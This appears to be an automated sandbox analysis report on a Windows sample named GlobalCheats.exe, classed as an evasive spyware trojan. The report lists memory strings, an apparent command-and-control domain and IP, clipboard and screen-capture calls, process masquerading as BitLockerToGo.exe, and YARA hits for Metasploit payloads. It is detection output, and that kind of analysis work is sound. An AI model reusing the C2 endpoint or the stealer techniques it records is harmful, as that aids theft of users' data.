Source: BitLockerToGo.exe, 00000004.00000003.1988270990.000000000362D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1988115244.000000000360E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1988225364.0000000003610000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://backcreammykiel.shop/api8
Source: BitLockerToGo.exe, 00000004.00000003.2075627627.0000000003669000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000002.2076833590.0000000003670000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2075944981.000000000366F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://backcreammykiel.shop/apiP
Source: BitLockerToGo.exe, 00000004.00000003.2012291283.0000000003694000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
Source: BitLockerToGo.exe, 00000004.00000003.2012291283.0000000003694000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
Source: GlobalCheats.exe, 00000000.00000002.1969067022.000000C000AB8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://cdn.discordapp.com/attachments/
Source: GlobalCheats.exe, 00000000.00000002.1969067022.000000C000AB8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://cdn.discordapp.com/avatars/
Source: GlobalCheats.exe, 00000000.00000002.1969067022.000000C000AB8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://cdn.discordapp.com/banners/
Source: GlobalCheats.exe, 00000000.00000002.1969067022.000000C000AB8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://cdn.discordapp.com/channel-icons/
Source: GlobalCheats.exe, 00000000.00000002.1969067022.000000C000AB8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://cdn.discordapp.com/guilds/
Source: GlobalCheats.exe, 00000000.00000002.1969067022.000000C000AB8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://cdn.discordapp.com/icons/
Source: GlobalCheats.exe, 00000000.00000002.1969067022.000000C000AB8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://cdn.discordapp.com/role-icons/
Source: GlobalCheats.exe, 00000000.00000002.1969067022.000000C000AB8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://cdn.discordapp.com/splashes/
Source: BitLockerToGo.exe, 00000004.00000003.1989305114.0000000003693000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: BitLockerToGo.exe, 00000004.00000003.1989305114.0000000003693000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: BitLockerToGo.exe, 00000004.00000003.1989305114.0000000003693000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: BitLockerToGo.exe, 00000004.00000003.2012291283.0000000003694000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
Source: BitLockerToGo.exe, 00000004.00000003.2012291283.0000000003694000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: GlobalCheats.exe	String found in binary or memory: https://d.symcb.com/cps0%
Source: GlobalCheats.exe	String found in binary or memory: https://d.symcb.com/rpa0
Source: GlobalCheats.exe	String found in binary or memory: https://d.symcb.com/rpa0)
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75C5ED000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://database.usgovcloudapi.net/Error
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75C5ED000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://datalake.azure.net/https://api.loganalytics.iohttps://graph.microsoft.us/https://api.loganal
Source: GlobalCheats.exe, 00000000.00000002.1969067022.000000C0009CE000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://discord.com/api/v9/
Source: GlobalCheats.exe, 00000000.00000002.1969067022.000000C000AB8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://discord.com/api/v9//sticker-packs
Source: GlobalCheats.exe, 00000000.00000002.1969067022.000000C000AB8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://discord.com/api/v9//voice/
Source: GlobalCheats.exe, 00000000.00000002.1969067022.000000C000AB8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://discord.com/api/v9//voice/regions
Source: GlobalCheats.exe, 00000000.00000002.1969067022.000000C0009CE000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://discord.com/api/v9/09Az~~
Source: GlobalCheats.exe, 00000000.00000002.1969067022.000000C000AB8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://discord.com/api/v9/applications
Source: GlobalCheats.exe, 00000000.00000002.1969067022.000000C000AB8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://discord.com/api/v9/channels/
Source: GlobalCheats.exe, 00000000.00000002.1969067022.000000C000AB8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://discord.com/api/v9/gateway
Source: GlobalCheats.exe, 00000000.00000002.1969067022.000000C000AB8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://discord.com/api/v9/gateway/bot
Source: GlobalCheats.exe, 00000000.00000002.1969067022.000000C000AB8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://discord.com/api/v9/guilds
Source: GlobalCheats.exe, 00000000.00000002.1969067022.000000C000AB8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://discord.com/api/v9/guilds/
Source: GlobalCheats.exe, 00000000.00000002.1969067022.000000C000AB8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://discord.com/api/v9/guilds/https://discord.com/api/v9/channels/https://discord.com/api/v9/use
Source: GlobalCheats.exe, 00000000.00000002.1969067022.000000C000AB8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://discord.com/api/v9/oauth2/
Source: GlobalCheats.exe, 00000000.00000002.1969067022.000000C000AB8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://discord.com/api/v9/oauth2/applications
Source: GlobalCheats.exe, 00000000.00000002.1969067022.000000C000AB8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://discord.com/api/v9/stage-instances
Source: GlobalCheats.exe, 00000000.00000002.1969067022.000000C000AB8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://discord.com/api/v9/stickers/
Source: GlobalCheats.exe, 00000000.00000002.1969067022.000000C000AB8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://discord.com/api/v9/users/
Source: GlobalCheats.exe, 00000000.00000002.1969067022.000000C000AB8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://discord.com/api/v9/webhooks/
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75C5ED000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://discord.com/developers/docs/reference#authentication-example-bot-token-authorization-headerE
Source: BitLockerToGo.exe, 00000004.00000003.1989305114.0000000003693000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: BitLockerToGo.exe, 00000004.00000003.1989305114.0000000003693000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: BitLockerToGo.exe, 00000004.00000003.1989305114.0000000003693000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75C5ED000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://github.com/golang/protobuf/issues/1609):
Source: GlobalCheats.exe, 00000000.00000002.1965699973.000000C000084000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/urfave/cli/blob/main/docs/CHANGELOG.md
Source: GlobalCheats.exe, 00000000.00000002.1965699973.000000C0001CC000.00000004.00001000.00020000.00000000.sdmp, GlobalCheats.exe, 00000000.00000002.1965699973.000000C00027F000.00000004.00001000.00020000.00000000.sdmp, GlobalCheats.exe, 00000000.00000002.1965699973.000000C000100000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/urfave/cli/blob/main/docs/CHANGELOG.md#deprecated-cli-app-action-signature
Source: GlobalCheats.exe, 00000000.00000002.1965699973.000000C00027F000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/urfave/cli/blob/main/docs/CHANGELOG.md#deprecated-cli-app-action-signatureAZaz
Source: GlobalCheats.exe, 00000000.00000002.1965699973.000000C0001CC000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/urfave/cli/blob/main/docs/CHANGELOG.md#deprecated-cli-app-action-signatureERROR
Source: GlobalCheats.exe, 00000000.00000002.1965699973.000000C000000000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/urfave/cli/blob/main/docs/CHANGELOG.md#deprecated-cli-app-action-signaturee
Source: GlobalCheats.exe, 00000000.00000002.1965699973.000000C000100000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/urfave/cli/blob/main/docs/CHANGELOG.md#deprecated-cli-app-action-signaturep
Source: GlobalCheats.exe, 00000000.00000002.1965699973.000000C000084000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/urfave/cli/blob/main/docs/CHANGELOG.md04
Source: GlobalCheats.exe, 00000000.00000002.1969067022.000000C0009CE000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://iamcrede/v1/projects/-/s:generateAccessTGo/go1.22.4
Source: GlobalCheats.exe, 00000000.00000002.1965699973.000000C000098000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://iamcredentials./v1/projects/-/serviceAccounts/:generateAccessTokentransport
Source: GlobalCheats.exe, 00000000.00000002.1968146456.000000C0007B8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://iamcredentials.go1.22.4;windows;amd64transport
Source: BitLockerToGo.exe, 00000004.00000003.2012291283.0000000003694000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75C5ED000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://login.microsoftonline.com/https://gallery.usgovcloudapi.net/mariadb.database.usgovcloudapi.n
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75C5ED000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://login.microsoftonline.us/https://manage.chinacloudapi.com/https://gallery.chinacloudapi.cn/m
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75C5ED000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://manage.chinacloudapi.com/publishsettings/indexhttps://manage.microsoftazure.de/publishsettin
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75C5ED000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://manage.windowsazure.us/publishsettings/indexerror
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75C5ED000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://management.core.windows.net/https://management.chinacloudapi.cn/https://servicebus.chinaclou
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75C5ED000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://management.usgovcloudapi.net/https://servicebus.usgovcloudapi.net/https://batch.core.usgovcl
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75C5ED000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://microsoftgraph.chinacloudapi.cnunmarshalScalar:
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75C5ED000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://ossrdbms-aad.database.chinacloudapi.cnerror
Source: GlobalCheats.exe, 00000000.00000002.1969067022.000000C0009CE000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://status.discord.com/api/v2/scheduled-maintenances/
Source: GlobalCheats.exe, 00000000.00000002.1969067022.000000C0008AC000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://status.discord.com/api/v2/scheduled-maintenances/active.json
Source: GlobalCheats.exe, 00000000.00000002.1969067022.000000C0008AC000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://status.discord.com/api/v2/scheduled-maintenances/active.jsonhttps://status.discord.com/api/v
Source: GlobalCheats.exe, 00000000.00000002.1969067022.000000C0008AC000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://status.discord.com/api/v2/scheduled-maintenances/upcoming.json
Source: BitLockerToGo.exe, 00000004.00000003.1988591576.000000000586D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.microsof
Source: BitLockerToGo.exe, 00000004.00000003.2011881474.0000000005966000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: BitLockerToGo.exe, 00000004.00000003.2011881474.0000000005966000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: BitLockerToGo.exe, 00000004.00000003.1988591576.000000000586D000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1988591576.0000000005866000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: BitLockerToGo.exe, 00000004.00000003.1988591576.0000000005842000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: BitLockerToGo.exe, 00000004.00000003.1988591576.000000000586D000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1988591576.0000000005866000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: BitLockerToGo.exe, 00000004.00000003.1988591576.0000000005842000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75C5ED000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://vault.azure.net/mysql.database.azure.comhttps://cosmos.azure.comFailed
Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75C5ED000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://vault.azure.netusgovtrafficmanager.netvault.usgovcloudapi.nethttps://vault.azure.cn/vault.mi
Source: BitLockerToGo.exe, 00000004.00000003.2012291283.0000000003694000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
Source: BitLockerToGo.exe, 00000004.00000003.1989305114.0000000003693000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: BitLockerToGo.exe, 00000004.00000003.2012291283.0000000003694000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
Source: BitLockerToGo.exe, 00000004.00000003.1989305114.0000000003693000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: BitLockerToGo.exe, 00000004.00000003.2011881474.0000000005966000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: BitLockerToGo.exe, 00000004.00000003.2011881474.0000000005966000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: BitLockerToGo.exe, 00000004.00000003.2011881474.0000000005966000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: BitLockerToGo.exe, 00000004.00000003.2011881474.0000000005966000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: BitLockerToGo.exe, 00000004.00000003.2011881474.0000000005966000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

Source: unknown	Network traffic detected: HTTP traffic on port 62542 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62545 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62538 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62539 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62540 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62541 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62543 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62544 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62538
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62539
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62540
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62541
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62542
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62543
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62544
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62545

Source: unknown	HTTPS traffic detected: 104.21.90.18:443 -> 192.168.2.4:62538 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.90.18:443 -> 192.168.2.4:62539 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.90.18:443 -> 192.168.2.4:62540 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.90.18:443 -> 192.168.2.4:62541 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.90.18:443 -> 192.168.2.4:62542 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.90.18:443 -> 192.168.2.4:62543 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.90.18:443 -> 192.168.2.4:62544 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.90.18:443 -> 192.168.2.4:62545 version: TLS 1.2

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Code function: 4_2_032DCF60 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

4_2_032DCF60

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Code function: 4_2_032DCF60 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

4_2_032DCF60

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Code function: 4_2_032DD360 GetDC,GetSystemMetrics,KiUserCallbackDispatcher,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,SelectObject,DeleteDC,ReleaseDC,DeleteObject,

4_2_032DD360

Source: GlobalCheats.exe, 00000000.00000000.1776340156.00007FF75D9FB000.00000002.00000001.01000000.00000003.sdmp

Binary or memory string: DirectInput8Create

memstr_924ccf50-6

Source: GlobalCheats.exe, 00000000.00000000.1779673420.00007FF75E4D5000.00000008.00000001.01000000.00000003.sdmp

Binary or memory string: GetRawInputData

memstr_9a013fdd-d

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000000.00000002.1971278042.000000C000FEC000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Matched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_032B4F10	4_2_032B4F10
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_032CEF50	4_2_032CEF50
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_032CE610	4_2_032CE610
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_032CFCD0	4_2_032CFCD0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_032D433D	4_2_032D433D
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_032D034E	4_2_032D034E
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_032D3350	4_2_032D3350
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_032D03D1	4_2_032D03D1
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_032B3A09	4_2_032B3A09
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_032EFA4E	4_2_032EFA4E
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_032EA250	4_2_032EA250
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_032B629B	4_2_032B629B
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_032B1AE2	4_2_032B1AE2
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_032E89C0	4_2_032E89C0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_032E5830	4_2_032E5830
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_032E88B0	4_2_032E88B0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_032B1092	4_2_032B1092
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_032D10F6	4_2_032D10F6
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_032CD8CC	4_2_032CD8CC
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_032B5F6B	4_2_032B5F6B
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_032D4F44	4_2_032D4F44
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_032E8790	4_2_032E8790
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_032B67D0	4_2_032B67D0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_032B3E48	4_2_032B3E48
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_032BFD20	4_2_032BFD20
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_032B451F	4_2_032B451F
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_032EA580	4_2_032EA580
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_032CF593	4_2_032CF593
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_032B1DF0	4_2_032B1DF0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_032B6DC0	4_2_032B6DC0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_032CB422	4_2_032CB422
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_032B14AE	4_2_032B14AE
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_032B5C8D	4_2_032B5C8D
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_032B8480	4_2_032B8480
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_032E2CF0	4_2_032E2CF0

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: String function: 032BFE90 appears 174 times
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: String function: 032B8E60 appears 40 times

Source: GlobalCheats.exe

Static PE information: Number of sections : 12 > 10

Source: GlobalCheats.exe, 00000000.00000002.1969067022.000000C0008DA000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameBITLOCKERTOGO.EXEj% vs GlobalCheats.exe
Source: GlobalCheats.exe, 00000000.00000002.1971607307.000000C001000000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameBITLOCKERTOGO.EXEj% vs GlobalCheats.exe
Source: GlobalCheats.exe, 00000000.00000000.1779673420.00007FF75E4DA000.00000008.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFileName vs GlobalCheats.exe
Source: GlobalCheats.exe, 00000000.00000002.1971607307.000000C00119E000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameBITLOCKERTOGO.EXEj% vs GlobalCheats.exe
Source: GlobalCheats.exe, 00000000.00000003.1953940488.00000264599B0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameBITLOCKERTOGO.EXEj% vs GlobalCheats.exe

Source: 00000000.00000002.1971278042.000000C000FEC000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Matched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@3/0@1/1

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Code function: 4_2_032D8D16 CoCreateInstance,

4_2_032D8D16

Source: C:\Users\user\Desktop\GlobalCheats.exe

File created: C:\Users\Public\Libraries\odojm.scif

Jump to behavior

Source: C:\Users\user\Desktop\GlobalCheats.exe

File opened: C:\Windows\system32\63fdac557662bbcde022dcf289a352a2ffde2ec8aaed0fa1f9e50b1f214da013AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Jump to behavior

Source: GlobalCheats.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\GlobalCheats.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: GlobalCheats.exe

ReversingLabs: Detection: 28%

Source: GlobalCheats.exe	String found in binary or memory: depgithub.com/docker/docker-credential-helpersv0.7.0h1:xtCHsjxogADNZcdv1pKUHXryefjlVRqWqIhk/uXJp0A=
Source: GlobalCheats.exe	String found in binary or memory: overflow:hidden;img src="http://addEventListenerresponsible for s.js"></script>

Source: C:\Users\user\Desktop\GlobalCheats.exe

File read: C:\Users\user\Desktop\GlobalCheats.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\GlobalCheats.exe "C:\Users\user\Desktop\GlobalCheats.exe"
